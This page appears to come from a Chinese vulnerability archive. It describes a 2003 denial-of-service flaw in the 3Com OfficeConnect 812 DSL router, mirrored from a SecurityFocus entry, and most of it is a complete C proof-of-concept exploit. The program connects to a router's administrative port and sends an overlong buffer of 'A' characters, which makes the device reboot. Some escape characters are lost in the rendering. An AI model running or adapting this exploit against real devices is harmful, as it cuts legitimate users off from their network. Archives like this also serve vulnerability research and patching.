3Com DSL Router 812 1.1.7/1.1.9/2.0 – Administrative Interface Long Request Denial of Service
漏洞ID | 1054042 | 漏洞类型 | |
发布时间 | 2003-07-21 | 更新时间 | 2003-07-21 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Hardware | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8248/info
A problem in the 3Com 812 OfficeConnect has been reported that may result in the router becoming unstable. Because of this, an attacker may be able to deny service to legitimate users of the vulnerable router by submitting an excessively long request.
/* 3com-DoS.c
*
* PoC DoS exploit for 3Com OfficeConnect DSL Routers.
This PoC exploit the
* vulnerability documented at:
<http://www.securityfocus.com/bid/8248>,
* discovered by David F. Madrid.
*
* Successful exploitation of the vulnerability should
cause the router to
* reboot. It is not believed that arbitrary code
execution is possible -
* check advisory for more information.
*
* -shaun2k2
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
int main(int argc, char *argv[]) {
if(argc < 3) {
printf("3Com OfficeConnect DSL Router DoS exploit by
shaun2k2 - <[email protected]>nn");
printf("Usage: 3comDoS <3com_router> <port>n");
exit(-1);
}
int sock;
char explbuf[521];
struct sockaddr_in dest;
struct hostent *he;
if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve %s!n", argv[1]);
exit(-1);
}
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
printf("3Com OfficeConnect DSL Router DoS exploit by
shaun2k2 - <[email protected]>nn");
dest.sin_addr = *((struct in_addr *)he->h_addr);
dest.sin_port = htons(atoi(argv[2]));
dest.sin_family = AF_INET;
printf("[+] Crafting exploit buffer.n");
memset(explbuf, 'A', 512);
memcpy(explbuf+512, "nnnnnnnn", 8);
if(connect(sock, (struct sockaddr *)&dest,
sizeof(struct sockaddr)) == -1) {
perror("connect()");
exit(-1);
}
printf("[+] Connected...Sending exploit buffer!n");
send(sock, explbuf, strlen(explbuf), 0);
sleep(2);
close(sock);
printf("n[+] Exploit buffer sent!n");
return(0);
}
相关推荐: Linksys EtherFast Cable/DSL访问权漏洞
Linksys EtherFast Cable/DSL访问权漏洞 漏洞ID 1203178 漏洞类型 未知 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2159 CNNVD-ID CNNVD-200212-84…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666